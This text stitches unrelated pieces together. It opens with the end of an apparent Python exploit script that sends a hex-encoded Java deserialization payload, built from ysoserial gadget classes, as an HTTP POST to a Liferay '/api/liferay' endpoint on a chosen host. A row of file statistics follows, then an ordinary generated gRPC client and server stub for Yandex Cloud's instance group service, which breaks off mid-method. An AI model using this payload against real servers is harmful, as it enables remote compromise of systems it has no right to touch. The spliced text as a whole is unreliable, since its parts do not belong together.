00\x16\x00\x02\x00\x17\x00\x00\x00\x04\x00\x01\x00\x18\x00\x0e\x00\x00\x00\x3f\x00\x00\x00\x03\x00\x00\x00\x01\xb1\x00\x00\x00\x02\x00\x11\x00\x00\x00\x06\x00\x01\x00\x00\x00\x33\x00\x12\x00\x00\x00\x20\x00\x03\x00\x00\x00\x01\x00\x13\x00\x37\x00\x00\x00\x00\x00\x01\x00\x1a\x00\x1b\x00\x01\x00\x00\x00\x01\x00\x1c\x00\x1d\x00\x02\x00\x01\x00\x15\x00\x1e\x00\x02\x00\x17\x00\x00\x00\x04\x00\x01\x00\x18\x00\x0e\x00\x00\x00\x49\x00\x00\x00\x04\x00\x00\x00\x01\xb1\x00\x00\x00\x02\x00\x11\x00\x00\x00\x06\x00\x01\x00\x00\x00\x37\x00\x12\x00\x00\x00\x2a\x00\x04\x00\x00\x00\x01\x00\x13\x00\x37\x00\x00\x00\x00\x00\x01\x00\x1a\x00\x1b\x00\x01\x00\x00\x00\x01\x00\x1f\x00\x20\x00\x02\x00\x00\x00\x01\x00\x21\x00\x22\x00\x03\x00\x08\x00\x29\x00\x0d\x00\x01\x00\x0e\x00\x00\x00\x1b\x00\x03\x00\x02\x00\x00\x00\x0f\xa7\x00\x03\x01\x4c\xb8\x00\x2f\x12\x31\xb6\x00\x35\x57\xb1\x00\x00\x00\x00\x00\x02\x00\x23\x00\x00\x00\x02\x00\x24\x00\x25\x00\x00\x00\x0a\x00\x01\x00\x01\x00\x26\x00\x28\x00\x09\x75\x71\x00\x7e\x00\x10\x00\x00\x01\xd4\xca\xfe\xba\xbe\x00\x00\x00\x31\x00\x1b\x07\x00\x02\x01\x00\x23\x79\x73\x6f\x73\x65\x72\x69\x61\x6c\x2f\x70\x61\x79\x6c\x6f\x61\x64\x73\x2f\x75\x74\x69\x6c\x2f\x47\x61\x64\x67\x65\x74\x73\x24\x46\x6f\x6f\x07\x00\x04\x01\x00\x10\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x07\x00\x06\x01\x00\x14\x6a\x61\x76\x61\x2f\x69\x6f\x2f\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x62\x6c\x65\x01\x00\x10\x73\x65\x72\x69\x61\x6c\x56\x65\x72\x73\x69\x6f\x6e\x55\x49\x44\x01\x00\x01\x4a\x01\x00\x0d\x43\x6f\x6e\x73\x74\x61\x6e\x74\x56\x61\x6c\x75\x65\x05\x71\xe6\x69\xee\x3c\x6d\x47\x18\x01\x00\x06\x3c\x69\x6e\x69\x74\x3e\x01\x00\x03\x28\x29\x56\x01\x00\x04\x43\x6f\x64\x65\x0a\x00\x03\x00\x10\x0c\x00\x0c\x00\x0d\x01\x00\x0f\x4c\x69\x6e\x65\x4e\x75\x6d\x62\x65\x72\x54\x61\x62\x6c\x65\x01\x00\x12\x4c\x6f\x63\x61\x6c\x56\x61\x72\x69\x61\x62\x6c\x65\x54\x61\x62\x6c\x65\x01\x00\x04\x74\x68\x69\x73\x01\x00\x25\x4c\x79\x73\x6f\x73\x65\x72\x69\x61\x6c\x2f\x70\x61\x79\x6c\x6f\x61\x64\x73\x2f\x75\x74\x69\x6c\x2f\x47\x61\x64\x67\x65\x74\x73\x24\x46\x6f\x6f\x3b\x01\x00\x0a\x53\x6f\x75\x72\x63\x65\x46\x69\x6c\x65\x01\x00\x0c\x47\x61\x64\x67\x65\x74\x73\x2e\x6a\x61\x76\x61\x01\x00\x0c\x49\x6e\x6e\x65\x72\x43\x6c\x61\x73\x73\x65\x73\x07\x00\x19\x01\x00\x1f\x79\x73\x6f\x73\x65\x72\x69\x61\x6c\x2f\x70\x61\x79\x6c\x6f\x61\x64\x73\x2f\x75\x74\x69\x6c\x2f\x47\x61\x64\x67\x65\x74\x73\x01\x00\x03\x46\x6f\x6f\x00\x21\x00\x01\x00\x03\x00\x01\x00\x05\x00\x01\x00\x1a\x00\x07\x00\x08\x00\x01\x00\x09\x00\x00\x00\x02\x00\x0a\x00\x01\x00\x01\x00\x0c\x00\x0d\x00\x01\x00\x0e\x00\x00\x00\x2f\x00\x01\x00\x01\x00\x00\x00\x05\x2a\xb7\x00\x0f\xb1\x00\x00\x00\x02\x00\x11\x00\x00\x00\x06\x00\x01\x00\x00\x00\x3b\x00\x12\x00\x00\x00\x0c\x00\x01\x00\x00\x00\x05\x00\x13\x00\x14\x00\x00\x00\x02\x00\x15\x00\x00\x00\x02\x00\x16\x00\x17\x00\x00\x00\x0a\x00\x01\x00\x01\x00\x18\x00\x1a\x00\x09\x70\x74\x00\x04\x50\x77\x6e\x72\x70\x77\x01\x00\x78\x71\x00\x7e\x00\x0d\x78'
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = (sys.argv[1], int(sys.argv[2]))
print '[+] connecting to %s port %s' % server_address
sock.connect(server_address)
print '[+] Sending payload...'
pwned = ('POST /api/liferay HTTP/1.1\r\n' +
'Content-Type: application/octet-stream\r\n' +
'User-Agent: Robots are my next of kin\r\n' +
'Host: ' + sys.argv[1] + ':' + sys.argv[2] +' \r\n' +
'Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2\r\n' +
'Connection: keep-alive\r\n' +
'Content-Length: ' + str(len(payload)) + '\r\n\r\n')
pwned += payload
sock.sendall(pwned)
sock.close()
print '[+] Done!'
| 482.945946 | 16,856 | 0.743019 | 4,372 | 17,869 | 3.035224 | 0.064044 | 0.118915 | 0.109194 | 0.065109 | 0.729314 | 0.672796 | 0.641824 | 0.613112 | 0.591183 | 0.555237 | 0 | 0.409708 | 0.010801 | 17,869 | 36 | 16,857 | 496.361111 | 0.341027 | 0.010857 | 0 | 0 | 0 | 0.090909 | 0.97249 | 0.955055 | 0 | 1 | 0 | 0 | 0 | 0 | null | null | 0.045455 | 0.090909 | null | null | 0.181818 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
bf1523c533ad1e4d28eda2be9ff6ba103a6fb25f | 39,680 | py | Python | yandex/cloud/compute/v1/instancegroup/instance_group_service_pb2_grpc.py | korsar182/python-sdk | 873bf2a9b136a8f2faae72e86fae1f5b5c3d896a | [
"MIT"
] | 36 | 2018-12-23T13:51:50.000Z | 2022-03-25T07:48:24.000Z | yandex/cloud/compute/v1/instancegroup/instance_group_service_pb2_grpc.py | korsar182/python-sdk | 873bf2a9b136a8f2faae72e86fae1f5b5c3d896a | [
"MIT"
] | 15 | 2019-02-28T04:55:09.000Z | 2022-03-06T23:17:24.000Z | yandex/cloud/compute/v1/instancegroup/instance_group_service_pb2_grpc.py | korsar182/python-sdk | 873bf2a9b136a8f2faae72e86fae1f5b5c3d896a | [
"MIT"
] | 18 | 2019-02-23T07:10:57.000Z | 2022-03-28T14:41:08.000Z | # Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
from yandex.cloud.access import access_pb2 as yandex_dot_cloud_dot_access_dot_access__pb2
from yandex.cloud.compute.v1.instancegroup import instance_group_pb2 as yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__pb2
from yandex.cloud.compute.v1.instancegroup import instance_group_service_pb2 as yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2
from yandex.cloud.operation import operation_pb2 as yandex_dot_cloud_dot_operation_dot_operation__pb2
class InstanceGroupServiceStub(object):
"""A set of methods for managing InstanceGroup resources.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.Get = channel.unary_unary(
'/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/Get',
request_serializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.GetInstanceGroupRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__pb2.InstanceGroup.FromString,
)
self.List = channel.unary_unary(
'/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/List',
request_serializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.ListInstanceGroupsRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.ListInstanceGroupsResponse.FromString,
)
self.Create = channel.unary_unary(
'/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/Create',
request_serializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.CreateInstanceGroupRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.CreateFromYaml = channel.unary_unary(
'/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/CreateFromYaml',
request_serializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.CreateInstanceGroupFromYamlRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.Update = channel.unary_unary(
'/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/Update',
request_serializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.UpdateInstanceGroupRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.UpdateFromYaml = channel.unary_unary(
'/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/UpdateFromYaml',
request_serializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.UpdateInstanceGroupFromYamlRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.Stop = channel.unary_unary(
'/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/Stop',
request_serializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.StopInstanceGroupRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.Start = channel.unary_unary(
'/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/Start',
request_serializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.StartInstanceGroupRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.Delete = channel.unary_unary(
'/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/Delete',
request_serializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.DeleteInstanceGroupRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.ListInstances = channel.unary_unary(
'/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/ListInstances',
request_serializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.ListInstanceGroupInstancesRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.ListInstanceGroupInstancesResponse.FromString,
)
self.DeleteInstances = channel.unary_unary(
'/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/DeleteInstances',
request_serializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.DeleteInstancesRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.StopInstances = channel.unary_unary(
'/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/StopInstances',
request_serializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.StopInstancesRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.ListOperations = channel.unary_unary(
'/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/ListOperations',
request_serializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.ListInstanceGroupOperationsRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.ListInstanceGroupOperationsResponse.FromString,
)
self.ListLogRecords = channel.unary_unary(
'/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/ListLogRecords',
request_serializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.ListInstanceGroupLogRecordsRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.ListInstanceGroupLogRecordsResponse.FromString,
)
self.ListAccessBindings = channel.unary_unary(
'/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/ListAccessBindings',
request_serializer=yandex_dot_cloud_dot_access_dot_access__pb2.ListAccessBindingsRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_access_dot_access__pb2.ListAccessBindingsResponse.FromString,
)
self.SetAccessBindings = channel.unary_unary(
'/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/SetAccessBindings',
request_serializer=yandex_dot_cloud_dot_access_dot_access__pb2.SetAccessBindingsRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.UpdateAccessBindings = channel.unary_unary(
'/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/UpdateAccessBindings',
request_serializer=yandex_dot_cloud_dot_access_dot_access__pb2.UpdateAccessBindingsRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.ResumeProcesses = channel.unary_unary(
'/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/ResumeProcesses',
request_serializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.ResumeInstanceGroupProcessesRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.PauseProcesses = channel.unary_unary(
'/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/PauseProcesses',
request_serializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.PauseInstanceGroupProcessesRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
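    # Minimal client-side sketch (assumptions: a reachable endpoint, valid
    # channel credentials, and the conventional short import alias
    # instance_group_service_pb2 -- none of this is part of the generated code):
    #   channel = grpc.secure_channel('compute.api.cloud.yandex.net:443', creds)
    #   stub = InstanceGroupServiceStub(channel)
    #   group = stub.Get(instance_group_service_pb2.GetInstanceGroupRequest(
    #       instance_group_id='...'))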
class InstanceGroupServiceServicer(object):
"""A set of methods for managing InstanceGroup resources.
"""
def Get(self, request, context):
"""Returns the specified InstanceGroup resource.
To get the list of available InstanceGroup resources, make a [List] request.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def List(self, request, context):
"""Retrieves the list of InstanceGroup resources in the specified folder.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Create(self, request, context):
"""Creates an instance group in the specified folder.
This method starts an operation that can be cancelled by another operation.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def CreateFromYaml(self, request, context):
"""Creates an instance group in the specified folder from a YAML file.
This method starts an operation that can be cancelled by another operation.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Update(self, request, context):
"""Updates the specified instance group.
This method starts an operation that can be cancelled by another operation.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def UpdateFromYaml(self, request, context):
"""Updates the specified instance group from a YAML file.
This method starts an operation that can be cancelled by another operation.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Stop(self, request, context):
"""Stops the specified instance group.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Start(self, request, context):
"""Starts the specified instance group.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Delete(self, request, context):
"""Deletes the specified instance group.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListInstances(self, request, context):
"""Lists instances for the specified instance group.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeleteInstances(self, request, context):
"""Delete instances from the instance group.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def StopInstances(self, request, context):
"""Stop instances from the instance group.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListOperations(self, request, context):
"""Lists operations for the specified instance group.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListLogRecords(self, request, context):
"""Lists logs for the specified instance group.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListAccessBindings(self, request, context):
"""Lists existing access bindings for the specified instance group.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def SetAccessBindings(self, request, context):
"""Sets access bindings for the specified instance group.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def UpdateAccessBindings(self, request, context):
"""Updates access bindings for the specified instance group.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ResumeProcesses(self, request, context):
"""Resumes all processes regarding management of the specified instance group,
i.e. scaling, checking instances' health, auto-healing and updating them.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def PauseProcesses(self, request, context):
"""Pauses all processes regarding management of the specified instance group,
i.e. scaling, checking instances' health, auto-healing and updating them. Running instances are not stopped.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_InstanceGroupServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'Get': grpc.unary_unary_rpc_method_handler(
servicer.Get,
request_deserializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.GetInstanceGroupRequest.FromString,
response_serializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__pb2.InstanceGroup.SerializeToString,
),
'List': grpc.unary_unary_rpc_method_handler(
servicer.List,
request_deserializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.ListInstanceGroupsRequest.FromString,
response_serializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.ListInstanceGroupsResponse.SerializeToString,
),
'Create': grpc.unary_unary_rpc_method_handler(
servicer.Create,
request_deserializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.CreateInstanceGroupRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'CreateFromYaml': grpc.unary_unary_rpc_method_handler(
servicer.CreateFromYaml,
request_deserializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.CreateInstanceGroupFromYamlRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'Update': grpc.unary_unary_rpc_method_handler(
servicer.Update,
request_deserializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.UpdateInstanceGroupRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'UpdateFromYaml': grpc.unary_unary_rpc_method_handler(
servicer.UpdateFromYaml,
request_deserializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.UpdateInstanceGroupFromYamlRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'Stop': grpc.unary_unary_rpc_method_handler(
servicer.Stop,
request_deserializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.StopInstanceGroupRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'Start': grpc.unary_unary_rpc_method_handler(
servicer.Start,
request_deserializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.StartInstanceGroupRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'Delete': grpc.unary_unary_rpc_method_handler(
servicer.Delete,
request_deserializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.DeleteInstanceGroupRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'ListInstances': grpc.unary_unary_rpc_method_handler(
servicer.ListInstances,
request_deserializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.ListInstanceGroupInstancesRequest.FromString,
response_serializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.ListInstanceGroupInstancesResponse.SerializeToString,
),
'DeleteInstances': grpc.unary_unary_rpc_method_handler(
servicer.DeleteInstances,
request_deserializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.DeleteInstancesRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'StopInstances': grpc.unary_unary_rpc_method_handler(
servicer.StopInstances,
request_deserializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.StopInstancesRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'ListOperations': grpc.unary_unary_rpc_method_handler(
servicer.ListOperations,
request_deserializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.ListInstanceGroupOperationsRequest.FromString,
response_serializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.ListInstanceGroupOperationsResponse.SerializeToString,
),
'ListLogRecords': grpc.unary_unary_rpc_method_handler(
servicer.ListLogRecords,
request_deserializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.ListInstanceGroupLogRecordsRequest.FromString,
response_serializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.ListInstanceGroupLogRecordsResponse.SerializeToString,
),
'ListAccessBindings': grpc.unary_unary_rpc_method_handler(
servicer.ListAccessBindings,
request_deserializer=yandex_dot_cloud_dot_access_dot_access__pb2.ListAccessBindingsRequest.FromString,
response_serializer=yandex_dot_cloud_dot_access_dot_access__pb2.ListAccessBindingsResponse.SerializeToString,
),
'SetAccessBindings': grpc.unary_unary_rpc_method_handler(
servicer.SetAccessBindings,
request_deserializer=yandex_dot_cloud_dot_access_dot_access__pb2.SetAccessBindingsRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'UpdateAccessBindings': grpc.unary_unary_rpc_method_handler(
servicer.UpdateAccessBindings,
request_deserializer=yandex_dot_cloud_dot_access_dot_access__pb2.UpdateAccessBindingsRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'ResumeProcesses': grpc.unary_unary_rpc_method_handler(
servicer.ResumeProcesses,
request_deserializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.ResumeInstanceGroupProcessesRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'PauseProcesses': grpc.unary_unary_rpc_method_handler(
servicer.PauseProcesses,
request_deserializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.PauseInstanceGroupProcessesRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'yandex.cloud.compute.v1.instancegroup.InstanceGroupService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
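# A hypothetical server-side sketch of wiring these handlers up via the
# registration helper defined just above (the servicer implementation, port,
# and executor settings are assumptions, not part of the generated file):
#
#   from concurrent import futures
#   server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))
#   add_InstanceGroupServiceServicer_to_server(MyInstanceGroupServicer(), server)
#   server.add_insecure_port('[::]:50051')
#   server.start()
#   server.wait_for_termination()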
# This class is part of an EXPERIMENTAL API.
class InstanceGroupService(object):
"""A set of methods for managing InstanceGroup resources.
"""
@staticmethod
def Get(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/Get',
yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.GetInstanceGroupRequest.SerializeToString,
yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__pb2.InstanceGroup.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def List(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/List',
yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.ListInstanceGroupsRequest.SerializeToString,
yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.ListInstanceGroupsResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Create(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/Create',
yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.CreateInstanceGroupRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def CreateFromYaml(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/CreateFromYaml',
yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.CreateInstanceGroupFromYamlRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Update(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/Update',
yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.UpdateInstanceGroupRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def UpdateFromYaml(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/UpdateFromYaml',
yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.UpdateInstanceGroupFromYamlRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Stop(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
